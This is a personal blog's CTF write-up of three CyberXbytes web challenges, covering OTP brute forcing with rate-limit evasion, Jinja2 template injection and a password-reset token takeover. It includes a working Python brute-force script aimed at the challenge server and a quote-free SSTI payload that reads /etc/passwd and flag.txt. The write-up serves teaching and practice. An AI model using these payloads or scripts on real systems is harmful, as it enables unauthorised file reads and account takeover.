

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/macabely.png">
  <link rel="icon" href="/img/macabely.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Macabely">
  <meta name="keywords" content="">
  
    <meta name="description" content="My walkthrough in web challenges on CyberXbytes">
<meta property="og:type" content="article">
<meta property="og:title" content="CyberXbytes Web challenges">
<meta property="og:url" content="https://xyz-macabely.github.io/2025/08/10/ctfs/cyberxbytes/index.html">
<meta property="og:site_name" content="Macabely">
<meta property="og:description" content="My walkthrough in web challenges on CyberXbytes">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://pbs.twimg.com/profile_banners/1808879606231150601/1749393248/1500x500">
<meta property="article:published_time" content="2025-08-09T21:00:00.000Z">
<meta property="article:modified_time" content="2025-10-08T11:35:56.243Z">
<meta property="article:author" content="Macabely">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://pbs.twimg.com/profile_banners/1808879606231150601/1749393248/1500x500">
  
  
  
  <title>CyberXbytes Web challenges - Macabely</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xyz-macabely.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.0.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Macabely</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="https://x.com/Macabely97021" target="_self">
                <i class="iconfont icon-twitter-fill"></i>
                <span></span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="https://www.linkedin.com/in/ali-hassan-02a479219" target="_self">
                <i class="iconfont icon-linkedin-fill"></i>
                <span></span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/null') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="CyberXbytes Web challenges"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          11k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          91 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">CyberXbytes Web challenges</h1>
            
            
              <div class="markdown-body">
                
                <p><img src="https://pbs.twimg.com/profile_banners/1808879606231150601/1749393248/1500x500" srcset="/img/loading.gif" lazyload></p>
<p>I was scrolling on X and saw a tweet about <a target="_blank" rel="noopener" href="https://cyberxbytes.com/">CyberXbytes</a> being published and hosting some challenges, so i decided to take a look.</p>
<h1 id="Silent-Bypass"><a href="#Silent-Bypass" class="headerlink" title="Silent Bypass"></a>Silent Bypass</h1><div class="note note-primary">
            <p>Bypass Me if U can (:</p> 
          </div>

<p>The first challenge was medium level and had 6 solvers (i was the seventh)<br><img src="/images/cyberx/Screenshot%202025-08-11%20204934.png" srcset="/img/loading.gif" lazyload></p>
<p>I opened the challenge, and it was a login page…<br><img src="/images/cyberx/Screenshot%202025-08-08%20113232.png" srcset="/img/loading.gif" lazyload></p>
<p>When i face login pages, i usually focus on three things:</p>
<ul>
<li>Default creds</li>
<li>Injections</li>
<li>Request manipulation</li>
</ul>
<p>But before that, i start fuzzing, JavaScript analysis in order to see if there are any other endpoints on the site or any leaking creds that can help me. After some time, i found three endpoints while fuzzing:</p>
<ul>
<li>admin &#x3D;&gt; probably has the flag</li>
<li>login &#x3D;&gt; our login page</li>
<li>otp &#x3D;&gt; maybe we need to enter otp after a successful login<br><img src="/images/cyberx/Screenshot%202025-08-08%20114332.png" srcset="/img/loading.gif" lazyload></li>
</ul>
<p>Looks great, but how do we log in? I tried to look for the things that i mentioned above, but none of them worked. When you enter wrong credentials, there is an error saying: <strong>Invalid credentials</strong>.</p>
<p>I tried common usernames, hoping the error gonna change cause in some cases, you may know that the username indeed exists if the error changed, so we can use the username the caused the different error and brute force for the password. But unfortunately, the error didn’t change; it was a robust logging system.</p>
<p>After some time, i opened the devtools to look for JS files. There were no files, but i found this.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-08%20115804.png" srcset="/img/loading.gif" lazyload alt="Classic"></p>
<p>After using the above creds, we can log in now. Noticed you get redirected to <code>/otp</code> endpoint. The otp requires 4 digits, and the site was checking it on the front end. I tried to manipulate that and add more digits to see what happens.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-08%20120139.png" srcset="/img/loading.gif" lazyload></p>
<p>To do this, you need to intercept the request through Burp (or any proxy you use) and add more digits in the otp parameter to see if the backend accepts it or not.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-08%20140959.png" srcset="/img/loading.gif" lazyload></p>
<p>Noticed the request was refused by the backend too (<strong>invalid otp</strong>). Okay, noticed we got a flask session after the login. The server may not even checking the OTP, and you can totally bypass it. I tried to go directly to <code>/admin</code> endpoint after the login, thinking i could bypass the OTP without the need to provide it, but i was wrong.<br><img src="/images/cyberx/Screenshot%202025-08-08%20141819.png" srcset="/img/loading.gif" lazyload></p>
<p>You probably get a special token after a successful otp request that you can use to enter the admin panel. The good thing is that the otp was just 4 digits, which is easy to brute force.<br>I made a wordlist with this script that i made to generate digits with the width as you need:</p>
<div class="code-wrapper"><pre><code class="hljs PYTHON"><span class="hljs-keyword">def</span> <span class="hljs-title function_">generate_wordlist</span>(<span class="hljs-params">start, end, width</span>):
    
    <span class="hljs-keyword">return</span> [<span class="hljs-built_in">str</span>(i).zfill(width) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(start, end + <span class="hljs-number">1</span>)]

<span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():
    <span class="hljs-keyword">try</span>:
 start = <span class="hljs-built_in">int</span>(<span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;start number (e.g., 0): &quot;</span>))
 end = <span class="hljs-built_in">int</span>(<span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;end number (e.g., 1000): &quot;</span>))
 width = <span class="hljs-built_in">int</span>(<span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;width (e.g., 4 for 0001): &quot;</span>))
        
        <span class="hljs-keyword">if</span> start &gt; end:
            <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Error: Start number must be less than or equal to end number.&quot;</span>)
            <span class="hljs-keyword">return</span>
        <span class="hljs-keyword">if</span> width &lt; <span class="hljs-number">1</span>:
            <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Error: Width must be positive.&quot;</span>)
            <span class="hljs-keyword">return</span>
            
 wordlist = generate_wordlist(start, end, width)
 filename = <span class="hljs-string">&quot;wordlist.txt&quot;</span>
        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(filename, <span class="hljs-string">&#x27;w&#x27;</span>) <span class="hljs-keyword">as</span> f:
            <span class="hljs-keyword">for</span> item <span class="hljs-keyword">in</span> wordlist:
 f.write(item + <span class="hljs-string">&#x27;\n&#x27;</span>)
        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;Wordlist saved to <span class="hljs-subst">&#123;filename&#125;</span>&quot;</span>)
        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;First few entries:&quot;</span>)
        <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;\n&#x27;</span>.join(wordlist[:<span class="hljs-number">5</span>]))  <span class="hljs-comment"># show first 5 for preview</span>
        
    <span class="hljs-keyword">except</span> ValueError:
        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Error, enter valid integers.&quot;</span>)
    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:
        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;error: <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:
 main()</code></pre></div>
<p>I intercept the otp request again, send it to the intruder, and start brute forcing using the wordlist i just made.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-08%20142733.png" srcset="/img/loading.gif" lazyload><br>I noticed that after 10 requests, you got a different response saying <strong>Too many attempts</strong>, indicating there is a rate limit in place, stopping us from brute forcing. </p>
<p>In this situation, you need first to know how is that rate limit works? Is it triggered after 10 false requests (which could be a problem, harder to bypass), or does it trigger because we just send the requests too fast? OR it may be just a filter in place but with no power (i don’t know how to name it xD) – sometimes developers add a rate limit to prevent brute forcing, but it doesn’t actually stop brute force attacks. You may see an error like <strong>Too many attempts</strong>, but if you ignore it, continued the brute force even with the error message appearing, and once you hit the right otp, you are in! –.</p>
<p>To know that we need to test it first. I start by sending the requests with <strong>.5 sec</strong> delay in between. You can do that by:</p>
<ol>
<li>Navigate to the <strong>Resource Pool</strong> tab in intruder</li>
<li>Start with 10 requests and <strong>500</strong> milliseconds</li>
</ol>
<p><img src="/images/cyberx/Screenshot%202025-08-08%20150808.png" srcset="/img/loading.gif" lazyload></p>
<p>Start the attack and see what happens.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-08%20151051.png" srcset="/img/loading.gif" lazyload></p>
<p>Noticed we didn’t get the “too many” error anymore, we just get the invalid one. By waiting until the correct otp hits, you will get the admin token and successfully get the flag</p>
<p><img src="/images/cyberx/Screenshot%202025-08-07%20215745.png" srcset="/img/loading.gif" lazyload><br><img src="/images/cyberx/Screenshot%202025-08-07%20220037.png" srcset="/img/loading.gif" lazyload alt="Flag"><br>I also made a script that do the same thing:</p>
<div class="code-wrapper"><pre><code class="hljs PYTHON"><span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> time
<span class="hljs-keyword">import</span> sys

TARGET_URL = <span class="hljs-string">&quot;http://185.185.82.29:10002/otp&quot;</span> 
SESSION_COOKIE = <span class="hljs-string">&quot;eyJvdHBfYXR0ZW1wdHMiOjAsIm90cF9sb2NrZWQiOmZhbHNlLCJ1c2VybmFtZSI6ImFkbWluIn0.aJXaEQ.TOPjMCZNHekejRSMo5edG8yoVY4&quot;</span>  
WORDLIST_PATH = <span class="hljs-string">&quot;wordlist.txt&quot;</span>     

session = requests.Session()
session.cookies.<span class="hljs-built_in">set</span>(<span class="hljs-string">&quot;session&quot;</span>, SESSION_COOKIE)

<span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;target: <span class="hljs-subst">&#123;TARGET_URL&#125;</span>&quot;</span>)
<span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;wordlist: <span class="hljs-subst">&#123;WORDLIST_PATH&#125;</span>&quot;</span>)

<span class="hljs-keyword">try</span>:
    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(WORDLIST_PATH, <span class="hljs-string">&#x27;r&#x27;</span>) <span class="hljs-keyword">as</span> wordlist_file:

 otps = [line.strip() <span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> wordlist_file <span class="hljs-keyword">if</span> line.strip()]
 total_otps = <span class="hljs-built_in">len</span>(otps)
        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;Loaded <span class="hljs-subst">&#123;total_otps&#125;</span>&quot;</span>)

        <span class="hljs-keyword">if</span> total_otps == <span class="hljs-number">0</span>:
            <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Wordlist is empty.&quot;</span>)
 sys.exit(<span class="hljs-number">1</span>)

        <span class="hljs-keyword">for</span> i, otp <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(otps):
            <span class="hljs-keyword">try</span>:
                
 payload = &#123;<span class="hljs-string">&quot;otp&quot;</span>: otp&#125;
 response = session.post(TARGET_URL, data=payload)
                <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;OTP: <span class="hljs-subst">&#123;otp&#125;</span> | Status: <span class="hljs-subst">&#123;response.status_code&#125;</span>&quot;</span>)
                <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;CyberXbytes&quot;</span> <span class="hljs-keyword">in</span> response.text:
                    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;[+] SUCCESS! Correct OTP found: <span class="hljs-subst">&#123;otp&#125;</span>&quot;</span>)
                    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;[*] Full Response:\n<span class="hljs-subst">&#123;response.text&#125;</span>&quot;</span>)
 sys.exit(<span class="hljs-number">0</span>)
                <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;Too many attempts&quot;</span> <span class="hljs-keyword">in</span> response.text:
                    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;\n[!] Rate limit&quot;</span>)
 sys.exit(<span class="hljs-number">1</span>)

            <span class="hljs-keyword">except</span> requests.exceptions.RequestException <span class="hljs-keyword">as</span> e:
                <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;failed for OTP <span class="hljs-subst">&#123;otp&#125;</span>: <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)

 time.sleep(<span class="hljs-number">0.5</span>)

<span class="hljs-keyword">except</span> FileNotFoundError:
    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;\n wordlist not found&quot;</span>)
 sys.exit(<span class="hljs-number">1</span>)
<span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:
    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;\nerror: <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)
 sys.exit(<span class="hljs-number">1</span>)</code></pre></div>
<p><img src="/images/cyberx/Screenshot%202025-08-07%20173719.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="Obfuscated-Echo"><a href="#Obfuscated-Echo" class="headerlink" title="Obfuscated Echo"></a>Obfuscated Echo</h1><p><img src="/images/cyberx/Screenshot%202025-08-11%20205459.png" srcset="/img/loading.gif" lazyload></p>
<div class="note note-primary">
            <p>In this challenge, your goal is to find a clever way to access the content of flag.txt using a specific exploit. The objective is to reveal the flag by leveraging template injection techniques. Can you figure out how to use the right command to get the flag? so can you cat flag.txt</p> 
          </div>


<div class="note note-danger">
            <p>You will be surprised how i solve at the end!!</p> 
          </div>

<p>This one was medium. Let’s see how to solve it<br><img src="/images/cyberx/Screenshot%202025-08-08%20211001.png" srcset="/img/loading.gif" lazyload></p>
<p>At the first of the challenge, you will face an empty page with a massage: <code>Hello noname............</code> Since the description says it’s a <strong>template injection attack</strong> which will ease on us, we just need to find the injectable parameter that we will use to implement the attack. You can start fuzzing for parameters here, but i added the <code>name</code> parameter directly, i just had the feeling it’s the right one.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-08%20212152.png" srcset="/img/loading.gif" lazyload></p>
<p>When it comes to SSTI, you have 3 phases:</p>
<ul>
<li>Detect</li>
<li>Identify</li>
<li>Exploit</li>
</ul>
<h2 id="Detect"><a href="#Detect" class="headerlink" title="Detect"></a>Detect</h2><p>First, we need to see if there is indeed an SSTI vulnerability or not. To detect that we have a bunch of formats to test, the most common ones are (<code>&#123;&#123; &#125;&#125;</code>, <code>&lt;% %&gt;</code>).<br>I started with the curly brackets format, since we know the site is running on Flask (a Python framework)<br><img src="/images/cyberx/Screenshot%202025-08-08%20214821.png" srcset="/img/loading.gif" lazyload></p>
<p>So the template engine likely will be one of the Python templating libraries (django, jinja, ..etc).</p>
<p>I start with this simple payload <code>&#123;&#123;7*7&#125;&#125;</code> which is supposed to get rendered by the engine as <strong>49</strong> if the vulnerability really exists.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-08%20215542.png" srcset="/img/loading.gif" lazyload></p>
<p>Cool! We got our output, but we didn’t finish yet.</p>
<h2 id="Identify"><a href="#Identify" class="headerlink" title="Identify"></a>Identify</h2><p>We need to know what exactly the type of template engine we are dealing with, probably it’s <strong>Jinja2</strong> or <strong>Django</strong>. To make sure, we need to inject another payload, something like<br><code>&#123;&#123;7*'7'&#125;&#125;</code> which is related to <strong>jinja2</strong>.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-09%20203642.png" srcset="/img/loading.gif" lazyload></p>
<p>Suddenly, we got an error. This indicates the debugger was open. The important thing here is that we got the template engine, it’s <strong>jinja2</strong>, and we got a weird <em>SyntaxError</em> says unexpected char <code>&#39;&amp;&#39;</code>. Where does that character come from??<br>I didn’t even inject <code>&amp;</code> in my payload at all, maybe there is some sort of WAF that replaces my characters??!</p>
<p>There was nothing suspicious in my payload except the single quotes <code>&#39;</code>. So i tried to inject only the single quotes and see what happens.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-09%20204745.png" srcset="/img/loading.gif" lazyload></p>
<p>Yup, single quotes and double quotes too are being sanitized by a blind WAF that i couldn’t really see in the code provided by the debugger.<br>Things are actually getting tricky since single and double quotes are sanitized, cause we need them in our payload. We need to figure something out</p>
<h2 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h2><p>One of the repos that i get my payloads reference from is : <a target="_blank" rel="noopener" href="https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Template%20Injection/Python/#jinja2-debug-statement">swisskyrepo</a></p>
<p>To make my exploit, i usually try to find <strong>classes</strong> that can help me to read files in the system, but since the quotes are sanitized, the exploit may not work due to syntax errors problems. We need an alternative way to read files in the system. </p>
<p>One way to do that is to get access to the <code>__builtins__</code> attribute, and to access that, we need a global function.<br>jinja2 has a global function called <code>get_flashed_messages()</code> that we can use to access the <code>__globals__</code> then <code>__builtins__</code> which has functions like <code>open()</code> that can be used to read files.</p>
<p>The other thing we need to use is the <code>attr</code> filter, which lets you access an attribute of an object by its name.<br>For example:</p>
<ul>
<li><code>user.name</code> is the same as <code>user|attr(&#39;name&#39;)</code></li>
</ul>
<p>But as you can see, there are quotes at the name part above <code>&#39;name&#39;</code> which are gonna be filtered, that’s why we need to use <code>request.args</code> to reference these attributes as variables instead, to get rid of the quotes and access them via the request module.<br>For example:</p>
<ul>
<li><code>&#123;&#123;get_flashed_messages|attr(request.args.p1)&#125;&#125;&amp;p1=__globals__</code> &#x3D;&gt; <code>get_flashed_messages.__globals__</code></li>
</ul>
<p>By these techniques combined, we can make a full exploit.</p>
<p>Start by reading the <code>/etc/passwd</code> file by using this payload:<br><code>&#123;&#123;%20get_flashed_messages|attr(request.args.p1)|attr(request.args.p2)(request.args.p3)|attr(request.args.p2)(request.args.p4)(request.args.p5)|attr(request.args.p6)()%20&#125;&#125;&amp;p1=__globals__&amp;p2=__getitem__&amp;p3=__builtins__&amp;p4=open&amp;p5=/etc/passwd&amp;p6=read</code></p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20202910.png" srcset="/img/loading.gif" lazyload></p>
<p>To get the flag, change the <code>/etc/passwd</code> part with <code>flag.txt</code></p>
<p>And we successfully got the flag.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-10%20221121.png" srcset="/img/loading.gif" lazyload></p>
<p>The funniest thing is, after all of that, i noticed there is a bug or a mislead at the challenge (i don’t know if it’s intended).<br>You can get the flag by just typing <code>flag.txt</code> in the name parameter, even if it’s followed by chunk characters</p>
<p><img src="/images/cyberx/Screenshot%202025-08-10%20221504.png" srcset="/img/loading.gif" lazyload alt="Flag"></p>
<h1 id="HackTHEPASS"><a href="#HackTHEPASS" class="headerlink" title="HackTHEPASS?"></a>HackTHEPASS?</h1><p><img src="/images/cyberx/Screenshot%202025-08-11%20204752.png" srcset="/img/loading.gif" lazyload></p>
<div class="note note-primary">
            <p>Register an account on the application. Identify a flaw within the forgot password functionality and login as user “<a href="mailto:&#104;&#x61;&#x63;&#107;&#46;&#x43;&#121;&#98;&#x65;&#x72;&#x58;&#98;&#121;&#x74;&#x65;&#115;&#64;&#x67;&#109;&#97;&#105;&#108;&#46;&#99;&#x6f;&#109;">hack.CyberXbytes@gmail.com</a>“. After successful login, you will see a flag displayed.</p> 
          </div>

<p>This one was Hard level, let’s take a look.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20210119.png" srcset="/img/loading.gif" lazyload></p>
<p>A simple login page looks like the one that Facebook has. There are no JS files, so i started fuzzing to see if there are any other endpoints that we can access.<br>I used Intruder with <code>common.txt</code> wordlist.</p>
<p>The fuzzer gives me three endpoints.</p>
<ol>
<li>console</li>
<li>register</li>
<li>forget-password</li>
</ol>
<p>The console one looks interesting, revealing that the debugger may be left open. i accessed this endpoint.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20210352.png" srcset="/img/loading.gif" lazyload></p>
<p>Yup, the debugger is left open.</p>
<p>I started creating an account to login. After  a successful login you will see this.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20211254.png" srcset="/img/loading.gif" lazyload></p>
<p>We need access to <code>hack.CyberXbytes@gmail.com</code> in order to get the flag. Let’s navigate to the<code>/forget-password</code> endpoint, which we’re gonna use to reset the victim’s password.</p>
<p>I saw that the reset function works by providing your email, then you will receive a reset link with a token that you can use to reset your password.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20211925.png" srcset="/img/loading.gif" lazyload></p>
<p>I added my email and received a link (Noticed you need to provide a real email since probably there is a real SMTP server running on the system)</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20212301.png" srcset="/img/loading.gif" lazyload></p>
<p>I noticed this token is 32 characters; it looks like an MD5 hash. We can make sure of that with sites like <a target="_blank" rel="noopener" href="https://hashes.com/en/tools/hash_identifier">hashes.com</a>.<br>Here is the thing, what exactly gets hashed? What does the server use the hash on, and then use it as a reset token?</p>
<p>That’s actually kinda wild, it’s maybe the email? Maybe the email with a timestamp? Maybe the email with a secret and timestamp (which will be a real issue for us).<br>You will never know what really gets hashed, but don’t forget we have the debugger left open. We need to make some sort of error to trigger the debugger and see the code.</p>
<p>I intercepted the reset request and tried to play with the parameter, i deleted the whole parameter.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20213844.png" srcset="/img/loading.gif" lazyload></p>
<p>Cool, we triggered an error, and we got what we want. I copied the response into the browser and found this code.</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20214052.png" srcset="/img/loading.gif" lazyload></p>
<p>The token was the MD5 hash of just the email, great. Now we need to MD5 the victim’s email and use the hash value as a token to reset  his password and take control over the account</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20215217.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20215152.png" srcset="/img/loading.gif" lazyload></p>
<p>And we got the flag</p>
<p><img src="/images/cyberx/Screenshot%202025-08-11%20215326.png" srcset="/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ctf/" class="print-no-link">#ctf</a>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/08/24/htb-m/nocturnal/" title="HTB Nocturnal Machine (Easy)">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">HTB Nocturnal Machine (Easy)</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/08/05/htb-m/code/" title="HTB Code Machine (Easy)">
                        <span class="hidden-mobile">HTB Code Machine (Easy)</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
